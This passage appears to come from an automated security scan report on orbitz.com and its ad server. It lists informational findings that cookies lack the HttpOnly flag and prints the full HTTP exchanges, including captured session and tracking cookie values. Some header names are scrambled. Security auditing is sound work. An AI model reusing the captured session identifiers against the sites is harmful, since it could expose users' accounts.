P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVa PSAa PSDa OUR OTR IND OTC"
Expires: Sun, 02 Oct 2011 23:55:23 GMT
Content-Type: application/javascript
Cache-Control: private, max-age=300
Set-Cookie: shoptube_id=f6d10bcb0c; expires=Mon, 01 Oct 2012 23:50:23 GMT; Max-Age=31536000; Path=/
Vary: Accept-Encoding
X-Cache: MISS from lb3-sv.int.pixazza.com
X-Cache-Lookup: MISS from lb3-sv.int.pixazza.com:80
Via: 1.0 lb3-sv.int.pixazza.com:80 (squid/2.6.STABLE18)
Connection: Keep-Alive

if (typeof(pixazza) == 'undefined') {
document.write('<script type="text/javascript">pixazza = luminate = {};<\/script>');
document.write('<script type="text/javascript" src="http://static.luminate.co
...[SNIP]...

14.259. http://www.orbitz.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:06:46 GMT
Content-Length: 174769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...

14.260. http://www.orbitz.com/App/SubmitQuickSearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /App/SubmitQuickSearch?z=7651&r=6bk HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 458
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=dc61&r=39i
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; mbox=session#1317600406536-142286#1317603970|PC#1317600406536-142286.19#1320194110|check#true#1317602170; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598608203:ss=1317596806325

searchType=air&source=quick_search&searchTab=quick_search&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|"; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:37:17 GMT; Path=/
Set-Cookie: OrbitzRegistration="N,3,0,0"; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:37:17 GMT; Path=/
Date: Mon, 03 Oct 2011 00:37:16 GMT
Content-Length: 3419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

14.261. http://www.orbitz.com/App/ViewDHTMLCalendar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/ViewDHTMLCalendar

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/ViewDHTMLCalendar?z=7473&r=o HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
ntCoent-Length: 960
Date: Mon, 03 Oct 2011 00:06:52 GMT
Content-Length: 960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css">

...[SNIP]...

14.262. http://www.orbitz.com/App/ViewFlightSearchResults

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/ViewFlightSearchResults

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/ViewFlightSearchResults?retrieveParams=true&z=115e&r=84x&z=115f&r=84y&lastPage=interstitial HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=7651&r=6bk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; mbox=session#1317600406536-142286#1317603970|PC#1317600406536-142286.19#1320194110|check#true#1317602170; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598608203:ss=1317596806325; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; OrbitzRegistration="N,2,0,0"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|"; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:37:19 GMT
Content-Length: 492180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 T
...[SNIP]...

14.263. http://www.orbitz.com/shop/hotelsearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shop/hotelsearch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; OrbitzRegistration="N,2,0,0"; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598618455:ss=1317596806325; mbox=session#1317600406536-142286#1317604079|PC#1317600406536-142286.19#1320194219|check#true#1317602279; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|egapp2192p.prod.orbitz.net; Domain=.orbitz.com; Path=/
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:52:52 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG=ABCDEFGHU0VNfEMxMTI4N3g3MTl8IHwxMzE3NjAyMzI1NDY3fEMxMTI4N3g3MTl8fDEwLzAyLzIwMTEgMTk6Mzg6NDUgUE18IHwg; Domain=orbitz.com; Expires=Wed, 02-Nov-2011 00:38:45 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:38:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:45 GMT
Content-Length: 243900


...[SNIP]...

14.264. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=225&rotator=true&width=519&adType=script&

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=225&rotator=true&width=519&adType=script&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=225&rotator=true&width=519&adType=script& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:48 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aebaa22-24733-1570161280-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 32
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 32
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var adRotator = new adRotator();

14.265. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:48 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeb2422-10897-1302538563-3; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv002p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1048
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1048
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Top hotel deals of the week';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=why-book-hotels&cnt=PRO'
var target = '_parent';
// target is '_top' for internal links,
...[SNIP]...

14.266. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:49 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba921-13167-437180534-2; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv003p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
ntCoent-Length: 1068
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1068
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Save up to 35% at eco-friendly hotels';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=eco-vacations&cnt=PRO&type=qs_dl'
var target = '_parent';
// target is '_top' f
...[SNIP]...

14.267. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:49 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba823-19234-1962717445-8; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1086
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1086
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Enjoy fall savings of up to 40% off hotels';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=qs_dl'
var target = '_parent';
// target is '_top'
...[SNIP]...

14.268. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:48 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeb2422-10897-1123568220-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv003p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1077
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1077
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Save up to 30% at Chicago hotels';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=chicagovacation&cnt=PRO&type=qs_dl'
var target = '_parent';
// target is '_top' for
...[SNIP]...

14.269. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=55&width=120&

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=55&width=120&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NGUserID (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=55&width=120& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:49 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba823-17416-299776494-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
ntCoent-Length: 634
Content-Type: application/x-javascript
Cache-Control: private
Content-Length: 634
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

document.write('<a target=_blank href=\"http://www.revresda.com/event.ng/Type=click&FlightID=90921&AdID=174434&TargetID=57890&Segments=&Targets=&Values=60,80,92,101,194,216,264,32876,33113,33155,33227
...[SNIP]...

14.270. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=1&

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=1&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NGUserID (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=1& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
